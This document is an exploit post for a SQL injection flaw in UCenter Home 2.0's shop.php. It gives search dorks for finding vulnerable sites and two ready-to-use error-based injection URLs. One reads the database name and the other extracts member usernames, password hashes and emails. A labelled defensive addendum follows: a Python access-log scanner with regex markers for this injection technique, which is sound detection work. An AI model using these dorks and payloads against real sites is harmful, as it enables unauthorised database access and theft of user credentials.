__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout

*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers

*/ Contact: knockoutr@msn.com

*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view

Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php

Values : (?)ac=view&shopid=

Vulnerable Style : SQL Injection (MySQL Error Based)

Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim's database name.

For inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okey.

Edit the DB name: `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okey.

Use hex conversion, then edit your SQL injection exploit..

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
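
For defenders reviewing web-server logs for the request pattern above, the following added example (not part of the original advisory) flags `shop.php?ac=view` requests whose `shopid` is not a plain integer or carries the error-based markers seen in the advisory's query. The combined log format, the sample lines and the function names are constructed assumptions, as is the premise that a legitimate `shopid` is a decimal integer like the advisory's `253`.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format is an assumption).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(0x7e,database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812',
    '198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 100',
]

# Markers of the MySQL error-based technique shown in this advisory.
MARKERS = {
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "information_schema": re.compile(r"information_schema", re.I),
    "group_by": re.compile(r"group\s+by", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
    "hex_literal": re.compile(r"0x[0-9a-f]{2,}", re.I),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def inspect_line(line):
    """Return (shopid, reasons) for a shop.php?ac=view request, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/shop.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # URL-decodes values
    if params.get("ac", [""])[0] != "view" or "shopid" not in params:
        return None
    reasons = []
    for value in params["shopid"]:
        if not re.fullmatch(r"[0-9]+", value):
            reasons.append("non_numeric_shopid")
        reasons += [name for name, rx in MARKERS.items() if rx.search(value)]
    return params["shopid"][0], sorted(set(reasons))


def flagged(lines):
    """Return [(line_number, shopid, reasons)] for requests that need review."""
    hits = ((n, inspect_line(line)) for n, line in enumerate(lines, 1))
    return [(n, h[0], h[1]) for n, h in hits if h and h[1]]


if __name__ == "__main__":
    for n, shopid, reasons in flagged(SAMPLE_LOG):
        print(f"line {n}: shopid={shopid[:40]!r} reasons={reasons}")
```

Parameters sent in a POST body do not appear in access logs, so the same check would have to run where the request body is visible, such as a WAF or application-level logging.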